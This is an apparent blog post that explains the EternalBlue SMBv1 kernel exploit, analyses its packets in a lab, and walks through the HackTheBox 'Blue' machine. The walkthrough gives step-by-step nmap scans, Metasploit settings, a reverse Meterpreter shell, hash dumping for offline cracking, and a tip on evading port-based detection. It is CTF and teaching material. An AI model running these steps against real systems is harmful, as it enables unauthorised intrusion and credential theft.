Exploit Review: EternalBlue

While this exploit has been out for quite some time this will be a bit of a history lesson as to why this serves as a perfect example of how dangerous this exploit was. EternalBlue first became known to the public in 2017 due to it being leaked by a group known as The Shadow Brokers. This exploit was initially used by the National Security Agency for at least 5 years until the leak as once it became publicly known Microsoft then had to release a patch known as MS17-010 to close the vulnerability.

Before we get into more detail of this exploit let’s explore some basics in operating system security. In computer science there is a concept known as ‘Protection Rings’ in regards to security as shown here:

Each ring provides a certain level of privileges as Ring 3 has the least amount of privileges while Ring 0 has the most. In modern operating systems such as Windows mostly Ring 3 and Ring 0 are used while the other 2 are considered optional. Ring 3 is what can be considered User Space which is where your typical everyday programs run while Ring 0 is considered Kernel Space which the operating system core functions run. Once a computer first boots up the kernel gets loaded up before anything else as it will deliver instructions to devices and programs to start. The concept is to let the user have control of Ring 3 by using various programs however access to Ring 0 is restricted. This is in place to protect the operating system from crashes or inadvertent mistakes by the user such as accidentally corrupting a critical operating system function. This concept generally works most of the time except sometimes one is able to access the kernel. This is a goal of exploitation. In order for an exploit to happen there has to be a vulnerability which can be known as a risk as an exploit is known as a threat. As in the case of EternalBlue this allowed a kernel exploit to occur. Gaining access to the kernel (Ring 0) means an attacker can bypass any security controls in place and essentially control the entire system. This is why a kernel exploit is one of the most dangerous.

This exploit takes advantage of a few bugs that are found in an older version of SMB (Server Message Block) as an attacker sends specially crafted messages to a targeted SMBv1 server. The result of this exploit can be Remote Code Execution (RCE) in which the attacker can gain full control of a system. The first bug is a miscalculation of allocated memory space as more data can be written than expected. This will lead to a heap overflow where extra data can overflow into adjacent memory space. This here is where the danger resides since extra information can be written to adjacent memory space this can allow an attacker to take control of system memory. System memory in a core function that is within Ring 0. To gain full system access a shellcode can be written and executed.

On investigating how this exploit works I used Metasploit’s MS17-010_EternalBlue exploit module. While running the exploit successfully on a target in my lab I also decided to run Wireshark for further investigation. There were a few observations that were interesting. In one of the early steps of the exploit is to fill NT_Trans with zeros or NOPs (No Operation) as this was observed in frame 41 as shown below here.

A few frames later another observation is made where several letter As are placed as this can be common in exploit development or fuzzing such as using 0x41 which is hexadecimal for the letter A. This seems as an attempt to overflow Trans2 Secondary as shown here.

This goes on for several other frames as the other interesting observation made here is in frame 171. In this frame Trans2 is affected with an error reply STATUS_INVALID_PARAMETER. From the information I have gathered this is where the exploit begins to take hold. While investigating the exploit code itself which was available for review I found this to be an interesting find. First the capture frame below. Take note of the status code value 0xc000000d.

Taking note of this is also found inside the code for the exploit provided in Metasploit. The code segment that provides some details is shown here.

What is interesting here is when the status_code value is 0xc000000d it will read out the STATUS_INVALID_PARAMETER and begin to disable NX. NX stands for No Execute as it is a mechanism to prevent code from being able to run or execute. Having the ability to disable NX will allow the injected shellcode to execute in this portion of memory which will give us a system shell. As frame 290 will show that TCP port 4444 is being accessed as this is the port that connects us to the Meterpreter shell which gives us system shell where we can execute whatever commands we like.

HTB: Blue

To show an example of this exploit at work I decided to do a write up on a very early HackTheBox machine called Blue. This is one of the easiest boxes to exploit and which makes it a decent beginner box. To begin we need to scan the box with nmap.

  • nmap -v -A 10.129.116.45 -oN tcpScn

As shown above it did find some open ports as the most interesting ones are TCP ports 139 and 445. Normally I might run a full port range scan from port 1-65535 however running this on the HackTheBox network turned out to be extremely slow so I opted to run the default scan instead. This is okay for now. Port 139 is more of a legacy protocol as it typically runs NetBIOS which can be associated with port SMB port 445. SMB is one we are most interested in. In some cases I may opt to run the command ‘smbclient’ to list shares but before we do that we can run another nmap scan to check for vulnerabilities.

  • nmap -v -p 139,445 10.129.116.45 –script=vuln

This shows that the machine is vulnerable to EternalBlue or MS17-010 which as explained before is a kernel exploit. With this exploit we will not need credentials when running it. We can use Metasploit and search for ‘ms17-010’ to find a list of modules we can use. This will list several to choose from.

As highlighted above we can use the ms17_010_eternalblue at the top of the list with the command ‘use 0’.

With the options shown here we will have to set a few items such as RHOSTS, LHOST and LPORT can be left as the default 4444 setting however I chose to change it to 2222. Take note that in a real pentest type of environment port 4444 can be easily detected and flagged as a potential attack so it doesn’t hurt to change it to another port number for the sake of practice. Another tip is we can set LHOST to tun0 instead of typing out my actual IP address. Some modules this may not work as in that case we would have to type the IP address instead. The commands are as follows:

  • set rhosts 10.129.116.45
  • set lhost tun0
  • set lport 2222

To verify we use ‘options’

With all of the options set in place it is good practice to run ‘check’ if the module supports it as this one does. First reason is to verify that the exploit will work as the second reason could be this is how far one might go in an actual pentest. Sometimes a critical vulnerability like this may crash a machine that cannot afford downtime such as one in a hospital. Since this is more of a CTF we just need to verify that the exploit will likely work.

This confirms that the target is vulnerable so we can run the exploit to gain a foothold into the target machine. Before running the exploit I decided to set the verbose option to true to provide a bit more detailed feedback upon execution. This can be set via this command:

  • set verbose true

This of course is optional as it may provide more feedback than needed, however it can be helpful to have verbose enabled in case the command or exploit seems to be hanging. We can now run the exploit by typing in ‘run’

As shown in the 2 images above the exploit ran successfully as now we will have a Meterpreter shell into the remote machine. For more information on what to run in Meterpreter we can just type in ‘help’ as it will display various commands to use. In my case I chose to run the commands ‘getuid’ and ‘hashdump’.

This shows we have full system control or Ring 0 with NT AUTHORITY\SYSTEM. All of this was done without the need for knowing a single user password to gain access of the machine and now we can access any file in this system. If we wanted to know the passwords we can try running an offline password cracking utility such as hashcat with the hashes we found using the hashdump command.

With full system control here we can obtain both the user.txt flag and the root.txt flag. The user.txt flag is located in the C:\Users\haris\Desktop.

The root flag is in the C:\Users\Administrator\Desktop directory.

Final Thoughts

The examples shown here provide a textbook example as to why systems should be kept up to date with the latest security patches. Gaining full system control remotely can cause a lot of headaches for the victim. At the very least disable or block SMB if possible. This is easier for a home user than a business that needs to share files and printers over a network which is a reason why EternalBlue has still affected machines over the years. I plan on more research of this exploit as well as some others I have in mind in the future. As for now this was a beginning of a journey into this topic. So onward and forward from here and until next time happy hacking.